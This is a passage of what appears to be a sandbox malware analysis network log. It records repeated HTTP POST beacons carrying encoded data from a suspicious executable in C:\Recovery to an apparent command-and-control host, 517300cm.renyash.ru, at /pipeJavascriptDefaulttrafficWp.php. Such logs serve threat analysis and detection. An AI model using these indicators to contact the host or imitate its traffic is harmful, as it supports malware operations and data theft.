Jan 9, 2025 18:13:34.915641069 CET	804	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MFAcS2krlokS7DNtoWVtTX2tXH6YJEfqKLgIals7tZNa6PzupmBSN0YHmYKhLni1Kft%2Bwfx9t1q6qBw0hAPp%2FscbxRJfSD571iiQw3oi8gEeTgNgPGT11NpA93vdzEiaOi4%2F5jMO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60f070bf642a5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3726&min_rtt=1684&rtt_var=4716&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=81003&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.4	50068	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:35.051045895 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:35.409157038 CET	1012	OUT	Data Raw: 50 5e 5e 5b 58 46 55 5e 59 58 51 54 5b 50 57 55 5f 53 58 5d 52 5a 5a 40 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: P^^[XFU^YXQT[PWU_SX]RZZ@^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z *U!7">+/8#6?):S!.6&1$#/(<:'\"/Y.4
Jan 9, 2025 18:13:35.504405022 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:35.673516035 CET	810	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BENMMa1dHSoZ%2B4exy%2F2TFaWxKfEMQrBtTLY3GcyJLWkN5R2H5AjvzVRafsHDPQ4w87rneZG7muivlyz%2BE3oROv0j3oexZLpJiCPF%2F4OEaijnVvcGXOtVGzGF1z%2BpRyX%2BRLXYAdTp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60f0caa3e4352-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4884&min_rtt=1807&rtt_var=6833&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=55242&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.4	50074	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:35.802252054 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:36.159199953 CET	1012	OUT	Data Raw: 50 56 5b 58 58 49 55 54 59 58 51 54 5b 50 57 50 5f 5c 58 54 52 5a 5a 49 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PV[XXIUTYXQT[PWP_\XTRZZI^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z 6 Z9?3/+/] 5(+6[5T$#-18+7,?:'\"/Y.4
Jan 9, 2025 18:13:36.267564058 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:36.557599068 CET	808	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P%2F1HVkNXAqvTl7XlF%2F1%2F2P3ovoxcFSKVfK%2BPdfPWSq7g4s73CadLFtUtJg7kA4JCHNWL5qp94rmzGakIC26xggER1tgwMDanvSbjEtucK8OqNTqM8tLTCsUMjTZ%2BlJadgpHNa8Wi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60f116b5f8cc8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3610&min_rtt=1897&rtt_var=4138&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=93571&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.4	50080	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:36.799756050 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:37.159346104 CET	1012	OUT	Data Raw: 55 50 5e 59 5d 40 55 51 59 58 51 54 5b 56 57 54 5f 5c 58 58 52 5b 5a 45 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UP^Y]@UQYXQT[VWT_\XXR[ZE^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#X)# ,"X?#?,'76#[+!%$0%87Y!?;Y)'\"/Y.,
Jan 9, 2025 18:13:37.494257927 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:37.617573977 CET	803	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4I1PCa%2Bnvx7z3iUZPmapZQlpkciyaiDdZQNyBmM2XS4qKk33lzHCIzoEYevzTRNN91%2BuDgUx0c3lwDio3t%2BJYaD1q48rvMR%2B48zH48KhJqhvWitEa7EYXWDt1vfyUGbAikZ2F8%2BT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60f17f888c35e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8580&min_rtt=4303&rtt_var=10168&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=37901&cwnd=58&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a Data Ascii: 44WXP
Jan 9, 2025 18:13:37.699961901 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.4	50089	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:37.841362953 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:38.190434933 CET	1012	OUT	Data Raw: 50 53 5b 5f 58 45 55 50 59 58 51 54 5b 5d 57 5c 5f 55 58 5e 52 5b 5a 48 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PS[_XEUPYXQT[]W\_UX^R[ZH^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z +#=_#Z.Y>#3[/(\"6;[=;"-R1R&8' ?<*'\"/Y.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.4	50092	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:38.243683100 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1292 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:38.596677065 CET	1292	OUT	Data Raw: 50 5f 5e 5e 58 42 50 54 59 58 51 54 5b 51 57 55 5f 50 58 5a 52 5a 5a 48 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: P_^^XBPTYXQT[QWU_PXZRZZH^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#_&!<&X>3'883#<0R"-%-2#[ /X<'\"/Y.0
Jan 9, 2025 18:13:38.712737083 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:38.977658987 CET	953	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LI7Ujjf%2BkIwidGGOaU9uXV%2F2ED2N99zUJKMN%2FtUYelUhR3usE6VxbNB4h1QxmuxR3NspJbAsf8pDSi37GDQ9BAu1uESggQFaTB5kic9JQst00iYMTLcCK39uZXDLcbjwTKjUgInF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60f20a9974407-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4236&min_rtt=1659&rtt_var=5778&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1617&delivery_rate=65523&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 06 1f 21 14 26 0b 2f 1c 30 3f 38 08 31 0f 2e 0c 21 0f 3a 59 2c 2d 27 1d 34 03 3f 5c 2d 31 25 13 36 59 3b 16 24 22 39 57 25 2f 20 08 22 0c 21 5d 01 12 27 03 27 5f 2e 5a 30 00 2f 03 27 28 3b 08 20 2d 3c 13 24 2b 29 0a 25 0d 23 0f 21 3d 3d 56 29 2e 35 5c 38 2f 2c 15 2e 37 2c 5a 3f 03 2b 51 0e 10 22 18 30 3e 2a 5e 28 3e 2c 02 26 22 38 10 3d 2c 2b 5d 24 3c 28 1e 3e 17 2c 10 27 00 38 5f 20 2c 33 03 2b 29 28 11 30 38 31 52 2a 28 20 5c 2e 00 2d 52 04 3e 54 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98!&/0?81.!:Y,-'4?\-1%6Y;$"9W%/ "!]''_.Z0/'(; -<$+)%#!==V).5\8/,.7,Z?+Q"0>^(>,&"8=,+]$<(>,'8_ ,3+)(081R( \.-R>TP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.4	50093	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:38.366111994 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:38.721720934 CET	1012	OUT	Data Raw: 55 53 5b 5c 58 44 55 55 59 58 51 54 5b 5d 57 54 5f 55 58 55 52 59 5a 45 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: US[\XDUUYXQT[]WT_UXURYZE^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#YU)!<9)3$,^0 '[\0U -S$ V%]+[!,4):'\"/Y.
Jan 9, 2025 18:13:38.829473972 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:38.988194942 CET	808	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J3%2Fk0bkDcmL1uiZwcZ%2BVHNFbcValgz3qRngQcbYw6u1Ts5wvd1s%2BnV2b%2FW%2FHgv0BE032i4UT018XklK4C1fHY1ysUoNTYo%2FbHc6glQ9dUXVObliDFeiYBRaRxGDN8%2BqWY5cHNjAh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60f216c068cbd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4149&min_rtt=2657&rtt_var=3981&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=100027&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a Data Ascii: 44WXP
Jan 9, 2025 18:13:39.077235937 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.4	50099	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:39.211869955 CET	301	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 9, 2025 18:13:39.565416098 CET	1012	OUT	Data Raw: 55 55 5b 5e 5d 45 55 51 59 58 51 54 5b 5d 57 52 5f 55 58 5f 52 5b 5a 48 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UU[^]EUQYXQT[]WR_UX_R[ZH^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#X>3>7Z2]>Z,3\"57=93!=T2V=T$;4/7Y<:'\"/Y.
Jan 9, 2025 18:13:39.687201023 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:39.982497931 CET	812	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BqjpwHRpuM%2Few89cOStJvKn4jIMALDMcqreQc1agoKn4lWex0GjJ%2BCGvZGNKBB0bHfGbgMSX9z7f%2Ba5immuAzClZUWrx%2FrxabumM9kdeMqvZmacxSeCatk%2FDsNmgwTupROn%2FICBL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60f26c91042db-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=6724&min_rtt=5325&rtt_var=4795&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1313&delivery_rate=88388&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.4	50105	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:40.118190050 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:40.471638918 CET	1012	OUT	Data Raw: 50 51 5b 5b 58 45 55 55 59 58 51 54 5b 56 57 52 5f 54 58 58 52 5f 5a 43 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PQ[[XEUUYXQT[VWR_TXXR_ZC^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#3\7?%=07\,/Y"%>85.5V%-W&+'_!,'('\"/Y.,
Jan 9, 2025 18:13:40.561299086 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:40.729887962 CET	811	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mLvjJzMVz2ib2tRuJUpnqIhtXj1se%2BXPV5mZgpRbPEsdJr8jBpbHD%2FiIQWmcOUjKuozB9%2Fz5hcixYmkY%2FTM06tR8xp0g1%2B3cQIQmoZ4xDP3%2FTY8t8EYASeoGTd4jFj48NWgn8OND"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60f2c4f9642e3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1961&min_rtt=1699&rtt_var=1162&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=384311&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.4	50111	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:40.848162889 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1008 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:41.206295967 CET	1008	OUT	Data Raw: 55 57 5e 59 58 41 50 57 59 58 51 54 5b 55 57 5d 5f 56 58 5a 52 5b 5a 45 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UW^YXAPWYXQT[UW]_VXZR[ZE^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z >>4<#$;7"&<9'6=6&)U%?#Y4('\"/Y.
Jan 9, 2025 18:13:41.443304062 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:41.712837934 CET	807	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eXLq140fxf0spCC7A6EUU3s3DTKvdxHdWFjUt35wb6JXCDYJyCDc22roRFAT8pXqdlce%2BXZ4PHpH8u2sZks%2FLttg243KYZzpbbQrNomF7HdK4O72Hr3lI959c9UYj8EAS1nQkTr%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60f31bcfc8c12-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=69346&min_rtt=43731&rtt_var=34696&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=33385&cwnd=176&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.4	50117	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:41.833280087 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:42.190629005 CET	1012	OUT	Data Raw: 50 53 5b 5a 58 48 55 56 59 58 51 54 5b 56 57 54 5f 54 58 59 52 5a 5a 47 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PS[ZXHUVYXQT[VWT_TXYRZZG^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z +05^7?>]4;^7X )/!.5R11;!/ ?:'\"/Y.,
Jan 9, 2025 18:13:42.441467047 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:42.703344107 CET	803	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DChJyMDz1X%2BRaRTP6dPFEhPhKZGsI2JcQA74pJeMrLNNQSPCBRSBon7JMueFyRBl28V04HAm2CaAvzyNhyPxXUGAFeK3ATGEiHKvKOi8PeUqgp0xux9Yk5zSNo4RzalsiYvjfiG2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60f380c8b0f79-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=40477&min_rtt=38131&rtt_var=18992&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=25658&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.4	50118	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
